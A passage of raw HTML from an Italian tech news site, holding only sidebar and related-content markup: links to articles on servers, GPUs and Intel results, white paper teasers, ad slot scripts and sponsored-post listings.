                <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/hardware/server/nvidia-server-asus-114116"  title="Sempre più Nvidia e intelligenza artificiale nei server di Asus">Sempre più Nvidia e intelligenza artificiale nei server di Asus</a></div>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/hardware/prezzi-continuo-calo-per-le-schede-grafiche-di-fascia-alta-114104"  title="Prezzi in continuo calo per le schede grafiche di fascia alta"><img width="238" height="178" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/07/screen-shot-2018-07-10-at-1.14.41-pm-100763576-large-238x178.jpg" alt="schede grafiche" title="Prezzi in continuo calo per le schede grafiche di fascia alta"/></a></div>                            </div>
            <div class="item-details">
                <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/hardware/prezzi-continuo-calo-per-le-schede-grafiche-di-fascia-alta-114104"  title="Prezzi in continuo calo per le schede grafiche di fascia alta">Prezzi in continuo calo per le schede grafiche di fascia alta</a></div>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/data-center/storage/112164-112164"  title="Pure Storage prende il volo e si prepara a conquistare cloud e Intelligenza Artificiale"><img width="238" height="178" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/04/foto_novità-AIRI-Rack-15-238x178.jpg" alt="" title="Pure Storage prende il volo e si prepara a conquistare cloud e Intelligenza Artificiale"/></a></div>                            </div>
            <div class="item-details">
                <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/data-center/storage/112164-112164"  title="Pure Storage prende il volo e si prepara a conquistare cloud e Intelligenza Artificiale">Pure Storage prende il volo e si prepara a conquistare cloud e Intelligenza Artificiale</a></div>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid-->

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/hardware/server/fujitsu-deep-learning-workstation-server-111267"  title="Fujitsu aggiunge funzionalità di Deep Learning a workstation e server"><img width="238" height="178" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/04/rx2540_m2_6_x_4-238x178.jpg" alt="deep learning" title="Fujitsu aggiunge funzionalità di Deep Learning a workstation e server"/></a></div>                            </div>
            <div class="item-details">
                <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/hardware/server/fujitsu-deep-learning-workstation-server-111267"  title="Fujitsu aggiunge funzionalità di Deep Learning a workstation e server">Fujitsu aggiunge funzionalità di Deep Learning a workstation e server</a></div>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/multimedia-pro/grafica/il-mining-fa-impennare-le-vendite-di-gpu-106976"  title="Il mining di Ethereum fa impennare le vendite di GPU discrete"><img width="238" height="178" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2016/11/nvidia_tesla_p100_gpu-238x178.jpg" alt="mining" title="Il mining di Ethereum fa impennare le vendite di GPU discrete"/></a></div>                            </div>
            <div class="item-details">
                <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/multimedia-pro/grafica/il-mining-fa-impennare-le-vendite-di-gpu-106976"  title="Il mining di Ethereum fa impennare le vendite di GPU discrete">Il mining di Ethereum fa impennare le vendite di GPU discrete</a></div>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/attualita/mercato/intel-secondo-trimestre-2017-positivo-106558"  title="Intel: il secondo trimestre 2017 stupisce tutti in positivo"><img width="238" height="178" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2016/11/http-2F2Fcom.ft_.imagepublish.prod_.s3.amazonaws-238x178.jpg" alt="intel" title="Intel: il secondo trimestre 2017 stupisce tutti in positivo"/></a></div>                            </div>
            <div class="item-details">
                <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/attualita/mercato/intel-secondo-trimestre-2017-positivo-106558"  title="Intel: il secondo trimestre 2017 stupisce tutti in positivo">Intel: il secondo trimestre 2017 stupisce tutti in positivo</a></div>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a rel="nofollow" href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_2_5b7e84ad4509b" data-td_block_id="td_uid_2_5b7e84ad4509b"><i class="td-icon-font td-icon-menu-left"></i></a><a rel="nofollow" href="#"  class="td-ajax-next-page" id="next-page-td_uid_2_5b7e84ad4509b" data-td_block_id="td_uid_2_5b7e84ad4509b"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --><style scoped>.td_uid_5_5b7e84ad55a0b_inline .td_module_wrap:hover .entry-title a {
                        color: #;
                    }

                    .td_uid_5_5b7e84ad55a0b_inline .td-next-prev-wrap a:hover i {
                        background-color: #;
                        border-color: #;
                    }
                    .td_uid_5_5b7e84ad55a0b_inline .td_module_wrap .td-post-category:hover {
                        background-color: #;
                    }

                    .td_uid_5_5b7e84ad55a0b_inline .td-pulldown-filter-display-option:hover {
                        color: # !important;
                    }

                    .td_uid_5_5b7e84ad55a0b_inline a.td-pulldown-filter-link:hover {
                        color: # !important;
                    }</style><script>var block_td_uid_5_5b7e84ad55a0b = new td_block();
block_td_uid_5_5b7e84ad55a0b.id = "td_uid_5_5b7e84ad55a0b";
block_td_uid_5_5b7e84ad55a0b.atts = '{"category_id":"1829","category_ids":"","tag_slug":"","autors_id":"","sort":"","installed_post_types":"","limit":"3","offset":"","unfilter_cio":"no","language_slug":"","custom_title":"WHITEPAPER GRATUITI","custom_url":"","header_text_color":"#","header_color":"#","border_top":"","color_preset":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"Tutto","ajax_pagination":"next_prev","ajax_pagination_infinite_stop":"","class":"td_block_widget td_uid_5_5b7e84ad55a0b_inline"}';
block_td_uid_5_5b7e84ad55a0b.td_column_number = "1";
block_td_uid_5_5b7e84ad55a0b.block_type = "td_block_white_paper";
block_td_uid_5_5b7e84ad55a0b.post_count = "3";
block_td_uid_5_5b7e84ad55a0b.found_posts = "15";
block_td_uid_5_5b7e84ad55a0b.max_num_pages = "5";
block_td_uid_5_5b7e84ad55a0b.header_color = "#";
block_td_uid_5_5b7e84ad55a0b.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_5_5b7e84ad55a0b);
</script><div class="td_block_wrap td_block_white_paper td_block_widget td_uid_5_5b7e84ad55a0b_inline td-pb-border-top"><div class="block-title"><span >WHITEPAPER GRATUITI</span></div><div id=td_uid_5_5b7e84ad55a0b class="td_block_inner"><ul class="listing-whitepaper">        <li>
            <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/settori-industriali/industria/computerworld-italia-speciale-industria-4-0-114366"  title="Computerworld Italia &#8211; Speciale Industria 4.0"><img width="150" height="210" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/07/cwi-speciale-manufacturing-cover-150x210.png" alt="Computerworld Speciale Industria 4.0" title="Computerworld Italia &#8211; Speciale Industria 4.0"/></a></div><!--img src="http://placehold.it/150x210" alt="" /-->
            <a rel="nofollow" class="cwi-category" href="https://www.cwi.it/settori-industriali/industria/computerworld-italia-speciale-industria-4-0-114366">white paper</a>
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/settori-industriali/industria/computerworld-italia-speciale-industria-4-0-114366"  title="Computerworld Italia &#8211; Speciale Industria 4.0">Computerworld Italia &#8211; Speciale Industria 4.0</a></div>            Un PDF da scaricare per leggerlo comodamente su pc o tablet e avere sotto mano e in un unica soluzione le notizie, le analisi e gli approfondimenti sulla trasformazione in atto nel settore manifatturiero, da più parti definita "quarta rivoluzione industriale".            <div style="overflow: hidden; margin-top: 10px"><a rel="nofollow" class="cwi-button" href="https://www.cwi.it/settori-industriali/industria/computerworld-italia-speciale-industria-4-0-114366">Scarica</a></div>
        </li>


                <li>
            <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/attualita/norme-e-regolamenti/gdpr/computerworld-italia-speciale-gdpr-111263"  title="Computerworld Italia &#8211; Speciale GDPR"><img width="150" height="210" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/04/computerworld-speciale-gdpr-150x210.jpg" alt="" title="Computerworld Italia &#8211; Speciale GDPR"/></a></div><!--img src="http://placehold.it/150x210" alt="" /-->
            <a rel="nofollow" class="cwi-category" href="https://www.cwi.it/attualita/norme-e-regolamenti/gdpr/computerworld-italia-speciale-gdpr-111263">white paper</a>
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/attualita/norme-e-regolamenti/gdpr/computerworld-italia-speciale-gdpr-111263"  title="Computerworld Italia &#8211; Speciale GDPR">Computerworld Italia &#8211; Speciale GDPR</a></div>            Un PDF da sfogliare online o scaricare per leggerlo comodamente su pc o tablet, per avere sotto mano e in un unica soluzione le notizie, le analisi e gli approfondimenti su come le aziende devono affrontare l'arrivo del GDPR.            <div style="overflow: hidden; margin-top: 10px"><a rel="nofollow" class="cwi-button" href="https://www.cwi.it/attualita/norme-e-regolamenti/gdpr/computerworld-italia-speciale-gdpr-111263">Scarica</a></div>
        </li>


                <li>
            <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/data-center/computerworld-italia-speciale-data-center-108353"  title="Computerworld Italia &#8211; Speciale Data Center"><img width="150" height="210" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2017/11/Computerworld-speciale-data-center-1-150x210.jpg" alt="" title="Computerworld Italia &#8211; Speciale Data Center"/></a></div><!--img src="http://placehold.it/150x210" alt="" /-->
            <a rel="nofollow" class="cwi-category" href="https://www.cwi.it/data-center/computerworld-italia-speciale-data-center-108353">white paper</a>
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/data-center/computerworld-italia-speciale-data-center-108353"  title="Computerworld Italia &#8211; Speciale Data Center">Computerworld Italia &#8211; Speciale Data Center</a></div>            Un PDF da sfogliare o scaricare su pc o tablet per avere sotto mano le notizie, le analisi e gli approfondimenti sulle principali tendenze dei Data Center: integrazione con il Cloud, approccio software-defined, ottimizzazione delle prestazioni energetiche e molto altro            <div style="overflow: hidden; margin-top: 10px"><a rel="nofollow" class="cwi-button" href="https://www.cwi.it/data-center/computerworld-italia-speciale-data-center-108353">Scarica</a></div>
        </li>


        </ul></div><div class="td-next-prev-wrap"><a rel="nofollow" href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_5_5b7e84ad55a0b" data-td_block_id="td_uid_5_5b7e84ad55a0b"><i class="td-icon-font td-icon-menu-left"></i></a><a rel="nofollow" href="#"  class="td-ajax-next-page" id="next-page-td_uid_5_5b7e84ad55a0b" data-td_block_id="td_uid_5_5b7e84ad55a0b"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block td_block_white_paper -->    
                                </div>
                            </div>
                                                        <!--div class="td-pb-span4 td-main-sidebar td-pb-border-top" role="complementary" itemscope="itemscope" itemtype="://schema.org/WPSideBar"-->
                            <div class="td-pb-span4 td-main-sidebar td-pb-border-top" role="complementary">
                                <div class="td-ss-main-sidebar">
                                    <aside class="widget widget_gpt_widget"><div class='cwi_dfp_widget' cwi-async-tagidslot='11'>
<!-- Beginning Async AdSlot 11 for Ad unit CWI/Hardware  ### size: [[300,600]] -->
<!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[11]]) -->
<div id='div-gpt-ad-795412788689030374-11'>
	<script type='text/javascript'>
		googletag.cmd.push(function() { googletag.display('div-gpt-ad-795412788689030374-11'); });
		//setInterval(function(){googletag.pubads().refresh([gptadslots[11]]);}, 60000);
	</script>
</div>
<!-- End AdSlot 11 -->
    </div></aside><aside class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><a rel="nofollow" href="http://www.cwi.it/go/newsletter-subscribe/?utm_source=home_cwi&amp;utm_medium=banner&amp;utm_campaign=Newsletter_2018&amp;utm_content=300x100" target="_self" class="vc_single_image-wrapper   vc_box_border_grey"><img class="vc_single_image-img " src="https://static.cwi.it/wp-content/uploads/2015/02/banner-cwi-newsletter.jpg" width="300" height="100" alt="banner-cwi-newsletter" title="banner-cwi-newsletter"></a></div></aside><style scoped>.td_uid_6_5b7e84ad5b162_inline .td_module_wrap:hover .entry-title a {
                        color: #;
                    }

                    .td_uid_6_5b7e84ad5b162_inline .td-next-prev-wrap a:hover i {
                        background-color: #;
                        border-color: #;
                    }
                    .td_uid_6_5b7e84ad5b162_inline .td_module_wrap .td-post-category:hover {
                        background-color: #;
                    }

                    .td_uid_6_5b7e84ad5b162_inline .td-pulldown-filter-display-option:hover {
                        color: # !important;
                    }

                    .td_uid_6_5b7e84ad5b162_inline a.td-pulldown-filter-link:hover {
                        color: # !important;
                    }</style><div class="td_block_wrap td_block_social_counter td_block_widget td_uid_6_5b7e84ad5b162_inline"><div class="td_social_type td-pb-margin-side td_social_facebook"><div class="td-sp td-sp-facebook"></div><span class="td_social_info">3,937</span><span class="td_social_info td_social_info_name">Fan</span><span class="td_social_button"><a rel="nofollow" href="https://www.facebook.com/computerworlditalia" class="external">Like</a></span></div><div class="td_social_type td-pb-margin-side td_social_twitter"><div class="td-sp td-sp-twitter"></div><span class="td_social_info">1,817</span><span class="td_social_info td_social_info_name">Follower</span><span class="td_social_button"><a rel="nofollow" href="https://twitter.com/ComputerworldIT" class="external">Segui</a></span></div></div> <!-- ./block --><aside class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><a rel="nofollow" href="https://www.linkedin.com/showcase/11067468/" class="external"><img style="margin-top: -10px" src="https://static.cwi.it/wp-content/uploads/2017/03/linkedin-social-counter-nome-2.png"></a></div></aside><style scoped>.td_uid_7_5b7e84ad912b9_inline .td_module_wrap:hover .entry-title a {
                        color: #;
                    }

                    .td_uid_7_5b7e84ad912b9_inline .td-next-prev-wrap a:hover i {
                        background-color: #;
                        border-color: #;
                    }
                    .td_uid_7_5b7e84ad912b9_inline .td_module_wrap .td-post-category:hover {
                        background-color: #;
                    }

                    .td_uid_7_5b7e84ad912b9_inline .td-pulldown-filter-display-option:hover {
                        color: # !important;
                    }

                    .td_uid_7_5b7e84ad912b9_inline a.td-pulldown-filter-link:hover {
                        color: # !important;
                    }</style><script>var block_td_uid_7_5b7e84ad912b9 = new td_block();
block_td_uid_7_5b7e84ad912b9.id = "td_uid_7_5b7e84ad912b9";
block_td_uid_7_5b7e84ad912b9.atts = '{"category_id":"164","category_ids":"","tag_slug":"","autors_id":"","sort":"","installed_post_types":"","limit":"5","offset":"","custom_title":"Diventa anche tu un Insider","custom_url":"","header_text_color":"#","header_color":"#","border_top":"","color_preset":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","ajax_pagination":"","ajax_pagination_infinite_stop":"","content":"<a rel="nofollow" href=\"\/go\/register-insider-access\/\">Registrati ora<\/a> e accedi gratuitamente ai nostri articoli, guide, approfondimenti, eBook, white paper e altre risorse premium","class":"td_block_widget td_uid_7_5b7e84ad912b9_inline"}';
block_td_uid_7_5b7e84ad912b9.td_column_number = "1";
block_td_uid_7_5b7e84ad912b9.block_type = "td_block_teaser_insider";
block_td_uid_7_5b7e84ad912b9.post_count = "5";
block_td_uid_7_5b7e84ad912b9.found_posts = "91";
block_td_uid_7_5b7e84ad912b9.max_num_pages = "19";
block_td_uid_7_5b7e84ad912b9.header_color = "#";
block_td_uid_7_5b7e84ad912b9.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_7_5b7e84ad912b9);
</script><div id="cwi-sidebar-insider-container" class="td_block_wrap td_block_teaser_insider td_block_widget td_uid_7_5b7e84ad912b9_inline td-pb-border-top"><div id="cwi-insider-intro"><div class="block-title"><span >Diventa anche tu un Insider</span></div><p><a rel="nofollow" href="/go/register-insider-access/">Registrati ora</a> e accedi gratuitamente ai nostri articoli, guide, approfondimenti, eBook, white paper e altre risorse premium</p></div><div id=td_uid_7_5b7e84ad912b9 class="cwi-insider-recommendations td_block_inner"><div class="block-title insider-list-title">Insider Consigliati</div><ul class="cwi-insider-recommentations-list">        <li class="cwi-insider-detail td_module_wrap td_module_teaser_insider" >
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/cloud-computing/serverless-computing-cosa-e-105089"  title="Serverless computing: cos&#8217;è e principi di base">Serverless computing: cos&#8217;è e principi di base</a></div>                    </li>
                <li class="cwi-insider-detail td_module_wrap td_module_teaser_insider" >
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/strategia-it/acquisti-e-procurement/102899-102899"  title="Acquisti IT: strategie efficaci per negoziare con i fornitori">Acquisti IT: strategie efficaci per negoziare con i fornitori</a></div>                    </li>
                <li class="cwi-insider-detail td_module_wrap td_module_teaser_insider" >
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/big-data/big-data-analytics/crea-soluzione-iot-analtics-tool-big-data-100998"  title="Crea una soluzione di IoT Analtics con i tool per Big Data">Crea una soluzione di IoT Analtics con i tool per Big...</a></div>                    </li>
                <li class="cwi-insider-detail td_module_wrap td_module_teaser_insider" >
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/cloud-computing/computerworld-italia-speciale-cloud-virtualizzazione-100694"  title="Computerworld Italia &#8211; Speciale Cloud e Virtualizzazione">Computerworld Italia &#8211; Speciale Cloud e Virtualizzazione</a></div>                    </li>
                <li class="cwi-insider-detail td_module_wrap td_module_teaser_insider" >
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/data-center/storage/memorie-flash-data-center-95635"  title="Flash: il ruolo delle memorie a stato solido nel data center">Flash: il ruolo delle memorie a stato solido nel data center</a></div>                    </li>
        </ul><p style="text-align: right;"><a rel="nofollow" class="read-more-insider" href="/c/insider/">Leggi di più</a></p></div></div> <!-- ./block --><aside class="widget widget_gpt_widget"><div class='cwi_dfp_widget' cwi-async-tagidslot='4'>
<!-- Beginning Async AdSlot 4 for Ad unit CWI/Hardware  ### size: [[300,600]] -->
<!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[4]]) -->
<div id='div-gpt-ad-795412788689030374-4'>
	<script type='text/javascript'>
		googletag.cmd.push(function() { googletag.display('div-gpt-ad-795412788689030374-4'); });
		//setInterval(function(){googletag.pubads().refresh([gptadslots[4]]);}, 60000);
	</script>
</div>
<!-- End AdSlot 4 -->
    </div></aside><aside class="widget widget_gpt_widget"><div class='cwi_dfp_widget' cwi-async-tagidslot='5'>
<!-- Beginning Async AdSlot 5 for Ad unit CWI/Hardware  ### size: [[300,100]] -->
<!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[5]]) -->
<div id='div-gpt-ad-795412788689030374-5'>
	<script type='text/javascript'>
		googletag.cmd.push(function() { googletag.display('div-gpt-ad-795412788689030374-5'); });
		//setInterval(function(){googletag.pubads().refresh([gptadslots[5]]);}, 60000);
	</script>
</div>
<!-- End AdSlot 5 -->
    </div></aside><aside class="widget widget_gpt_widget"><div class='cwi_dfp_widget' cwi-async-tagidslot='6'>
<!-- Beginning Async AdSlot 6 for Ad unit CWI/Hardware  ### size: [[300,100]] -->
<!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[6]]) -->
<div id='div-gpt-ad-795412788689030374-6'>
	<script type='text/javascript'>
		googletag.cmd.push(function() { googletag.display('div-gpt-ad-795412788689030374-6'); });
		//setInterval(function(){googletag.pubads().refresh([gptadslots[6]]);}, 60000);
	</script>
</div>
<!-- End AdSlot 6 -->
    </div></aside><aside class="widget widget_gpt_widget"><div class='cwi_dfp_widget' cwi-async-tagidslot='7'>
<!-- Beginning Async AdSlot 7 for Ad unit CWI/Hardware  ### size: [[300,100]] -->
<!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[7]]) -->
<div id='div-gpt-ad-795412788689030374-7'>
	<script type='text/javascript'>
		googletag.cmd.push(function() { googletag.display('div-gpt-ad-795412788689030374-7'); });
		//setInterval(function(){googletag.pubads().refresh([gptadslots[7]]);}, 60000);
	</script>
</div>
<!-- End AdSlot 7 -->
    </div></aside><aside class="widget widget_gpt_widget"><div class='cwi_dfp_widget' cwi-async-tagidslot='3'>
<!-- Beginning Async AdSlot 3 for Ad unit CWI/Hardware  ### size: [[300,250]] -->
<!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[3]]) -->
<div id='div-gpt-ad-795412788689030374-3'>
	<script type='text/javascript'>
		googletag.cmd.push(function() { googletag.display('div-gpt-ad-795412788689030374-3'); });
		//setInterval(function(){googletag.pubads().refresh([gptadslots[3]]);}, 60000);
	</script>
</div>
<!-- End AdSlot 3 -->
    </div></aside><style scoped>.td_uid_8_5b7e84ad9b29f_inline .td_module_wrap:hover .entry-title a {
                        color: #;
                    }

                    .td_uid_8_5b7e84ad9b29f_inline .td-next-prev-wrap a:hover i {
                        background-color: #;
                        border-color: #;
                    }
                    .td_uid_8_5b7e84ad9b29f_inline .td_module_wrap .td-post-category:hover {
                        background-color: #;
                    }

                    .td_uid_8_5b7e84ad9b29f_inline .td-pulldown-filter-display-option:hover {
                        color: # !important;
                    }

                    .td_uid_8_5b7e84ad9b29f_inline a.td-pulldown-filter-link:hover {
                        color: # !important;
                    }</style><script>var block_td_uid_8_5b7e84ad9b29f = new td_block();
block_td_uid_8_5b7e84ad9b29f.id = "td_uid_8_5b7e84ad9b29f";
block_td_uid_8_5b7e84ad9b29f.atts = '{"category_id":"398","category_ids":"","tag_slug":"","autors_id":"","sort":"","installed_post_types":"","limit":"3","offset":"","custom_title":"BrandPost (info)","custom_url":"http:\/\/www.cwi.it\/informazioni\/brandpost-articoli-sponsorizzati-su-computerworld-italia\/","header_text_color":"#","header_color":"#","border_top":"","color_preset":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","ajax_pagination":"","ajax_pagination_infinite_stop":"","class":"td_block_widget td_uid_8_5b7e84ad9b29f_inline"}';
block_td_uid_8_5b7e84ad9b29f.td_column_number = "1";
block_td_uid_8_5b7e84ad9b29f.block_type = "td_block_7";
block_td_uid_8_5b7e84ad9b29f.post_count = "3";
block_td_uid_8_5b7e84ad9b29f.found_posts = "51";
block_td_uid_8_5b7e84ad9b29f.max_num_pages = "17";
block_td_uid_8_5b7e84ad9b29f.header_color = "#";
block_td_uid_8_5b7e84ad9b29f.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_8_5b7e84ad9b29f);
</script><div class="td_block_wrap td_block_7 td_block_widget td_uid_8_5b7e84ad9b29f_inline td-pb-border-top"><div class="block-title"><a rel="nofollow" href="http://www.cwi.it/informazioni/brandpost-articoli-sponsorizzati-su-computerworld-italia/">BrandPost (info)</a></div><div id=td_uid_8_5b7e84ad9b29f class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_wrap td_module_6" >

        <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/gestionali/verso-la-fatturazione-elettronica-114319"  title="Verso la Fatturazione Elettronica"><img width="100" height="75" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/07/wolters-kluwer-fattura-smart-100x75.jpg" alt="" title="Verso la Fatturazione Elettronica"/></a></div>
        <div class="item-details">
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/gestionali/verso-la-fatturazione-elettronica-114319"  title="Verso la Fatturazione Elettronica">Verso la Fatturazione Elettronica</a></div>            <div class="meta-info">
                <a rel="nofollow" href="https://www.cwi.it/c/articoli" class="td-post-category">Articoli</a>                                <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-07-24T12:14:53+00:00" >Lug 24, 2018</time></div>                            </div>

        </div>

        
                </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_wrap td_module_6" >

        <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/contentdocument-management/il-tuo-multifunzione-e-regola-col-gdpr-113677"  title="Il tuo multifunzione è in regola col GDPR?"><img width="100" height="75" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/06/gdpr-stampante-multifunzione-ricoh-100x75.jpg" alt="" title="Il tuo multifunzione è in regola col GDPR?"/></a></div>
        <div class="item-details">
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/contentdocument-management/il-tuo-multifunzione-e-regola-col-gdpr-113677"  title="Il tuo multifunzione è in regola col GDPR?">Il tuo multifunzione è in regola col GDPR?</a></div>            <div class="meta-info">
                <a rel="nofollow" href="https://www.cwi.it/c/articoli" class="td-post-category">Articoli</a>                                <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-07-03T10:25:59+00:00" >Lug 3, 2018</time></div>                            </div>

        </div>

        <div class="cwi-sponsored">Sponsorizzato da <span>Ricoh</span></div>
                </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_wrap td_module_6" >

        <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/gestionali/fatturazione-elettronica-comunicare-un-cambiamento-epocale-113687"  title="Fatturazione elettronica: comunicare un cambiamento epocale"><img width="100" height="75" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/06/fattura-elettronica-wolters-kluwer-100x75.jpg" alt="" title="Fatturazione elettronica: comunicare un cambiamento epocale"/></a></div>
        <div class="item-details">
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/gestionali/fatturazione-elettronica-comunicare-un-cambiamento-epocale-113687"  title="Fatturazione elettronica: comunicare un cambiamento epocale">Fatturazione elettronica: comunicare un cambiamento epocale</a></div>            <div class="meta-info">
                <a rel="nofollow" href="https://www.cwi.it/c/brandpost" class="td-post-category">BrandPost</a>                                <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-06-25T13:16:33+00:00" >Giu 25, 2018</time></div>                            </div>

        </div>

        <div class="cwi-sponsored">Sponsorizzato da <span>Wolters Kluwer</span></div>
                </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block --><style scoped>.td_uid_9_5b7e84ada6c17_inline .td_module_wrap:hover .entry-title a {
                        color: #;
                    }

                    .td_uid_9_5b7e84ada6c17_inline .td-next-prev-wrap a:hover i {
                        background-color: #;
                        border-color: #;
                    }
                    .td_uid_9_5b7e84ada6c17_inline .td_module_wrap .td-post-category:hover {
                        background-color: #;
                    }

                    .td_uid_9_5b7e84ada6c17_inline .td-pulldown-filter-display-option:hover {
                        color: # !important;
                    }

                    .td_uid_9_5b7e84ada6c17_inline a.td-pulldown-filter-link:hover {
                        color: # !important;
                    }</style><script>var block_td_uid_9_5b7e84ada6c17 = new td_block();
block_td_uid_9_5b7e84ada6c17.id = "td_uid_9_5b7e84ada6c17";
block_td_uid_9_5b7e84ada6c17.atts = '{"category_id":"2","category_ids":"","tag_slug":"","autors_id":"","sort":"","installed_post_types":"","limit":"3","offset":"","custom_title":"DA NON PERDERE","custom_url":"","header_text_color":"#","header_color":"#","border_top":"","color_preset":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","ajax_pagination":"next_prev","ajax_pagination_infinite_stop":"","class":"td_block_widget td_uid_9_5b7e84ada6c17_inline"}';
block_td_uid_9_5b7e84ada6c17.td_column_number = "1";
block_td_uid_9_5b7e84ada6c17.block_type = "td_block_11";
block_td_uid_9_5b7e84ada6c17.post_count = "3";
block_td_uid_9_5b7e84ada6c17.found_posts = "1586";
block_td_uid_9_5b7e84ada6c17.max_num_pages = "529";
block_td_uid_9_5b7e84ada6c17.header_color = "#";
block_td_uid_9_5b7e84ada6c17.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_9_5b7e84ada6c17);
</script><div class="td_block_wrap td_block_11 td_block_widget td_uid_9_5b7e84ada6c17_inline td-pb-border-top"><div class="block-title"><span >DA NON PERDERE</span></div><div id=td_uid_9_5b7e84ada6c17 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_wrap td_module_10" >
            <div class="td-module-thumb"><a rel="nofollow" href="https://www.cwi.it/sistemi-operativi/mac-os-x/114656-114656"  title="Office 365 per Mac: da settembre nuove funzionalità solo per macOS Sierra e High Sierra"><img width="180" height="135" class="entry-thumb" src="https://static.cwi.it/wp-content/uploads/2018/08/microsoft_office_2019-180x135.jpg" alt="microsoft_office_2019" title="Office 365 per Mac: da settembre nuove funzionalità solo per macOS Sierra e High Sierra"/></a></div>
            <div class="item-details">
            <div class="entry-title td-module-title"><a rel="nofollow" href="https://www.cwi.it/sistemi-operativi/mac-os-x/114656-114656"  title="Office 365 per Mac: da settembre nuove funzionalità solo per macOS Sierra e High Sierra">Office 365 per Mac: da settembre nuove funzionalità solo per macOS Sierra e High...</a></div>                <div class="meta-info">
